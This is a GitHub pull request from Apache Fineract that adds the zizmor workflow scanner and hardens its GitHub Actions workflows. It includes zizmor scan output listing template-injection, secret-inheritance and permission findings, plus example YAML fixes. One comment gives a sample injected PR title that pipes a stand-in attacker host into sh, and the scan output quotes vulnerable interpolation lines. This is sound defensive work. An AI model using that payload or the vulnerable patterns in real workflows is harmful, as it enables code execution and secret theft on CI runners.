
FINERACT-2421: Refactor and secure GitHub Actions workflows#5890

Merged
Aman-Mittal merged 1 commit into apache:develop from Aman-Mittal:FINERACT-2421/zizmor-check on Jun 3, 2026

Conversation

@Aman-Mittal
Member

@Aman-Mittal Aman-Mittal commented May 26, 2026

  • Added a new GitHub workflow (.github/workflows/zizmor.yml) to automatically scan workflow files for security vulnerabilities using zizmor.
  • Configured the scan to trigger on pushes to any branch and pull requests to develop whenever files in .github/workflows/** are modified.
  • Configured the zizmor action with pinned SHAs for security, enforcing a minimum severity and confidence level of medium, and disabling online audits.

Description

Describe the changes made and why they were made. (Ignore if these details are present on the associated Apache Fineract JIRA ticket.)

Checklist

Please make sure these boxes are checked before submitting your pull request - thanks!

  • Write the commit message as per our guidelines
  • Acknowledge that we will not review PRs that are not passing the build ("green") - it is your responsibility to get a proposed PR to pass the build, not primarily the project's maintainers.
  • Create/update unit or integration tests for verifying the changes made.
  • Follow our coding conventions.
  • Add required Swagger annotation and update API documentation at fineract-provider/src/main/resources/static/legacy-docs/apiLive.htm with details of any API changes
  • This PR must not be a "code dump". Large changes can be made in a branch, with assistance. Ask for help on the developer mailing list.

Your assigned reviewer(s) will follow our guidelines for code reviews.
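A workflow that matches the three bullets in the description above, written here as an added example rather than the zizmor.yml merged in this PR. The inputs min-severity, min-confidence, online-audits and advanced-security are the ones documented for zizmorcore/zizmor-action; the permissions block and the persist-credentials setting are my choices, not copied from the PR; and every <sha> is a placeholder that must be replaced by a full commit hash before use. It goes one step beyond the bullets by also watching .github/dependabot.yml, because the scan output later in this thread shows zizmor auditing that file too:

```yaml
# .github/workflows/zizmor.yml (illustrative; not the file from this PR)
name: zizmor

on:
  push:
    paths:
      - ".github/workflows/**"
      - ".github/dependabot.yml"   # zizmor audits this file as well
  pull_request:
    branches: [develop]
    paths:
      - ".github/workflows/**"
      - ".github/dependabot.yml"

# Least privilege: an offline scan only reads the tree. Uploading SARIF to
# code scanning would additionally need security-events: write.
permissions:
  contents: read

jobs:
  zizmor:
    runs-on: ubuntu-latest
    steps:
      - name: Check out workflow files
        # Pin to a full commit SHA, never a mutable tag; <sha> is a placeholder.
        uses: actions/checkout@<sha> # v4
        with:
          # The scanner never pushes, so do not leave GITHUB_TOKEN in .git/config.
          persist-credentials: false

      - name: Run zizmor
        uses: zizmorcore/zizmor-action@<sha> # v0.x, placeholder SHA
        with:
          # Findings below these thresholds are reported but do not fail the job.
          min-severity: medium
          min-confidence: medium
          # Offline mode: no GitHub API calls, so no token is needed. The audits
          # that need the API (impostor-commit, known-vulnerable-actions,
          # ref-confusion, stale-action-refs) are skipped.
          online-audits: false
          # Print findings to the log and fail on them instead of uploading SARIF.
          advanced-security: false
```

The job ends with zizmor's own exit code, which encodes the highest severity it found (14 means at least one high-severity finding); the `Error: Process completed with exit code 14` in the scan output below is exactly that case.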

@Aman-Mittal
Member Author

Seems like I need to fix the security flaws raised by zizmor:

warning[dependabot-cooldown]: insufficient cooldown in Dependabot updates
--> ./.github/dependabot.yml:6:5
|
6 | - package-ecosystem: "github-actions"
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ missing cooldown configuration
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#dependabot-cooldown

warning[dependabot-cooldown]: insufficient cooldown in Dependabot updates
--> ./.github/dependabot.yml:13:5
|
13 | - package-ecosystem: "docker"
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^ missing cooldown configuration
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#dependabot-cooldown

error[excessive-permissions]: overly broad permissions
--> ./.github/workflows/full-build-ci.yml:7:3
|
7 | pull-requests: write
| ^^^^^^^^^^^^^^^^^^^^ pull-requests: write is overly broad at the workflow level
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#excessive-permissions

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:11:11
|
11 | uses: ./.github/workflows/build-core.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
12 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:16:11
|
16 | uses: ./.github/workflows/build-progressive-loan.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
17 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:21:11
|
21 | uses: ./.github/workflows/build-docker.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
22 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:26:11
|
26 | uses: ./.github/workflows/build-documentation.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
27 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:31:11
|
31 | uses: ./.github/workflows/build-quality-checks.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
32 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:36:11
|
36 | uses: ./.github/workflows/build-cucumber.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
37 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:41:11
|
41 | uses: ./.github/workflows/build-postgresql.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
42 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:46:11
|
46 | uses: ./.github/workflows/build-mysql.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
47 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:51:11
|
51 | uses: ./.github/workflows/build-mariadb.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
52 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:56:11
|
56 | uses: ./.github/workflows/build-e2e-tests.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
57 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:61:11
|
61 | uses: ./.github/workflows/liquibase-only-postgresql.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
62 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:66:11
|
66 | uses: ./.github/workflows/smoke-messaging.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
67 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:71:11
|
71 | uses: ./.github/workflows/verify-api-backward-compatibility.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
72 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:76:11
|
76 | uses: ./.github/workflows/verify-liquibase-backward-compatibility.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
77 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:81:11
|
81 | uses: ./.github/workflows/verify-liquibase-ddl-safety.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
82 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:86:11
|
86 | uses: ./.github/workflows/regression-safety-db-changes.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
87 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:91:11
|
91 | uses: ./.github/workflows/sonarqube.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
92 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:96:11
|
96 | uses: ./.github/workflows/run-integration-test-sequentially-postgresql.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
97 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

warning[secrets-inherit]: secrets unconditionally inherited by called workflow
--> ./.github/workflows/full-build-ci.yml:101:11
|
101 | uses: ./.github/workflows/publish-dockerhub.yml
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ this reusable workflow
102 | secrets: inherit
| ---------------- inherits all parent secrets
|
= note: audit confidence → High
= help: audit documentation → https://docs.zizmor.sh/audits/#secrets-inherit

error[template-injection]: code injection via template expansion
--> ./.github/workflows/pr-title-check.yml:18:22
|
17 | run: |
| --- this run block
18 | title="${{ github.event.pull_request.title }}"
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/publish-dockerhub.yml:40:20
|
39 | run: |
| --- this run block
40 | TAGS=${{ github.ref_name }}
| ^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/regression-safety-db-changes.yml:34:33
|
27 | run: |
| --- this run block
...
34 | git fetch origin "${{ github.event.pull_request.base.ref }}" --no-tags
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/regression-safety-db-changes.yml:35:51
|
27 | run: |
| --- this run block
...
35 | MERGE_BASE=$(git merge-base "origin/${{ github.event.pull_request.base.ref }}" HEAD)
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/verify-api-backward-compatibility.yml:42:45
|
38 | run: |
| --- this run block
...
42 | git fetch "https://github.com/${{ github.event.pull_request.head.repo.full_name }}.git"
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/verify-api-backward-compatibility.yml:43:18
|
38 | run: |
| --- this run block
...
43 | "${{ github.event.pull_request.head.ref }}:refs/remotes/pr-head" --no-tags
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/verify-commits.yml:39:35
|
39 | run: git fetch origin ${{ github.base_ref }}
| --- this run block ^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/verify-commits.yml:45:35
|
42 | run: |
| --- this run block
...
45 | --base-ref origin/${{ github.base_ref }}
| ^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/verify-liquibase-backward-compatibility.yml:74:38
|
73 | run: |
| --- this run block
74 | echo "Base branch ref: ${{ github.event.pull_request.base.ref }}"
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/verify-liquibase-ddl-safety.yml:27:36
|
27 | run: git fetch origin "${{ github.event.pull_request.base.ref }}" --no-tags
| --- this run block ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/verify-liquibase-ddl-safety.yml:32:51
|
31 | run: |
| --- this run block
32 | MERGE_BASE=$(git merge-base "origin/${{ github.event.pull_request.base.ref }}" HEAD)
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

error[template-injection]: code injection via template expansion
--> ./.github/workflows/verify-liquibase-ddl-safety.yml:63:35
|
60 | run: |
| --- this run block
...
63 | --base-ref origin/${{ github.event.pull_request.base.ref }}
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ may expand into attacker-controllable code
|
= note: audit confidence → High
= note: this finding has an auto-fix
= help: audit documentation → https://docs.zizmor.sh/audits/#template-injection

149 findings (18 ignored, 97 suppressed, 14 fixable): 0 informational, 0 low, 21 medium, 13 high
Error: Process completed with exit code 14.
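Fixes for three of the four finding classes in that report (dependabot-cooldown, excessive-permissions and template-injection), as added examples that are not the changes merged in this PR. File names follow the report; the job names, the seven-day cooldown, the illustrative title policy and every <sha> placeholder are mine. The secrets-inherit class is a reusable-workflow contract problem and is treated separately further down:

```yaml
# 1. dependabot-cooldown (.github/dependabot.yml): wait before adopting a
#    freshly published action or image version, so a hijacked release is
#    likely to have been yanked before Dependabot proposes it.
version: 2
updates:
  - package-ecosystem: "github-actions"
    directory: "/"
    schedule:
      interval: "weekly"
    cooldown:
      default-days: 7
  - package-ecosystem: "docker"
    directory: "/"
    schedule:
      interval: "weekly"
    cooldown:
      default-days: 7

---
# 2. excessive-permissions (full-build-ci.yml): read-only at the workflow
#    level; pull-requests: write only on the single job that comments.
permissions:
  contents: read

jobs:
  comment-on-pr:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      pull-requests: write
    steps:
      - name: Comment on the PR (illustrative step)
        env:
          GH_TOKEN: ${{ github.token }}
          PR_NUMBER: ${{ github.event.pull_request.number }}
        run: gh pr comment "$PR_NUMBER" --body "full build finished"

---
# 3. template-injection (pr-title-check.yml, verify-*.yml, ...):
#    ${{ }} is substituted into the script BEFORE bash runs it, so a PR
#    title or branch name such as   x"; curl attacker.example | sh; echo "
#    becomes shell code.
#
#    BEFORE (vulnerable, as in the report):
#      - run: |
#          title="${{ github.event.pull_request.title }}"
#
#    AFTER: route the value through an environment variable; bash then
#    treats it as data, never as code.
jobs:
  pr-title:
    runs-on: ubuntu-latest
    steps:
      - name: Check PR title
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: |
          title="$PR_TITLE"
          # Illustrative policy: require a JIRA key prefix.
          [[ "$title" =~ ^FINERACT-[0-9]+: ]] || { echo "bad title: $title"; exit 1; }

  base-diff:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@<sha> # v4, pin a full SHA
        with:
          persist-credentials: false
          fetch-depth: 0
      - name: Fetch base branch
        env:
          BASE_REF: ${{ github.event.pull_request.base.ref }}
        run: |
          # The env var removes code injection; the ref-format check rejects a
          # crafted name that git could otherwise parse as an option or path.
          git check-ref-format --branch "$BASE_REF"
          git fetch origin "$BASE_REF" --no-tags
          MERGE_BASE=$(git merge-base "origin/$BASE_REF" HEAD)
          echo "merge base: $MERGE_BASE"
```

Quoting `"${{ ... }}"` inside the script, as several of the reported lines do, is not a fix: the quotes are part of the text being substituted into, so a value containing `"` closes them. Only the env-var form keeps the value out of the script entirely. For head.repo.full_name and head.ref the same pattern applies, and those two are fully attacker-chosen on a fork PR, so validate them before passing them to git.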

Review threads (collapsed): .github/workflows/full-build-ci.yml (outdated), .github/workflows/build-core.yml (outdated), .github/workflows/build-core.yml
@Aman-Mittal Aman-Mittal force-pushed the FINERACT-2421/zizmor-check branch from 3d8b044 to d6fb43f on May 27, 2026 14:41
@Aman-Mittal Aman-Mittal marked this pull request as ready for review May 27, 2026 15:42
@Aman-Mittal
Copy link
Copy Markdown
Member Author

@adamsaghy Ready for review, can you review it again?

@Aman-Mittal Aman-Mittal changed the title from "FINERACT-2421: Add zizmor GitHub Actions security analysis workflow" to "FINERACT-2421: Refactor and secure GitHub Actions workflows" on May 27, 2026
@Aman-Mittal Aman-Mittal requested a review from adamsaghy May 27, 2026 15:47
@Aman-Mittal Aman-Mittal force-pushed the FINERACT-2421/zizmor-check branch 2 times, most recently from 619b8a6 to 4c728cc on June 1, 2026 15:58
Commit message:

  • refactored reusable workflow configuration for GitHub Actions
  • removed direct push triggers from reusable workflows and standardized workflow_call usage
  • added and adjusted concurrency handling for CI workflows to manage redundant runs
  • hardened workflow security by replacing inline GitHub context interpolation with environment variables in shell scripts
  • added explicit secret declarations and removed secrets: inherit usage
  • added persist-credentials: false to checkout steps across workflows
  • updated workflow permissions and zizmor security analysis configuration
  • added zizmor GitHub Actions security scanning workflow and related ignore rules
  • fixed malformed workflow syntax and cleaned duplicate configuration lines
  • updated Dependabot cooldown configuration for Maven and Docker updates
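What the "explicit secret declarations", "removed direct push triggers", "persist-credentials: false" and concurrency points in that commit message look like as a caller/callee pair, written as an added example and not the project's refactored workflows. It also resolves the secrets-inherit findings from the scan output above. SONAR_TOKEN as the secret name, the job names, the Gradle task and every <sha> placeholder are illustrative; only the workflow file names are taken from the report:

```yaml
# Caller: .github/workflows/full-build-ci.yml (illustrative)
name: Full Build CI
on:
  push:
    branches: [develop]
  pull_request:
    branches: [develop]

# One live run per PR (or per ref on push); a newer push cancels the older run.
concurrency:
  group: ${{ github.workflow }}-${{ github.event.pull_request.number || github.ref }}
  cancel-in-progress: true

permissions:
  contents: read

jobs:
  build-core:
    # No `secrets:` key at all: the callee receives nothing beyond GITHUB_TOKEN.
    uses: ./.github/workflows/build-core.yml

  sonarqube:
    uses: ./.github/workflows/sonarqube.yml
    # Name each secret the callee may see. `secrets: inherit` would hand it
    # every repository and organization secret, including the registry
    # credentials that only publish-dockerhub.yml should ever touch.
    secrets:
      SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }}

---
# Callee: .github/workflows/sonarqube.yml (illustrative)
name: SonarQube
on:
  # Reachable only through a caller. With no push/pull_request trigger of its
  # own it cannot run, or exercise its permissions, outside the CI entrypoint.
  workflow_call:
    secrets:
      SONAR_TOKEN:
        required: true   # the caller must pass it explicitly; nothing is implicit

permissions:
  contents: read

jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@<sha> # v4, pin a full SHA
        with:
          # Without this, GITHUB_TOKEN is stored in .git/config and readable
          # by every later step, including third-party actions.
          persist-credentials: false
          fetch-depth: 0

      - name: Analyse
        env:
          SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }}
        run: ./gradlew sonar   # illustrative build command
```

A callee that declares its secrets under workflow_call fails at validation time if the caller forgets one, so dropping `secrets: inherit` surfaces every real dependency rather than hiding it; any secret a callee does not declare simply does not exist inside it.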
@Aman-Mittal Aman-Mittal force-pushed the FINERACT-2421/zizmor-check branch from f0e6e69 to 049e1b8 on June 1, 2026 16:23
Contributor

@adamsaghy adamsaghy left a comment


LGTM

@adamsaghy
Contributor

@Aman-Mittal You can merge if you believe it is ready! ;)

@Aman-Mittal Aman-Mittal merged commit 5b79dda into apache:develop Jun 3, 2026
176 of 177 checks passed
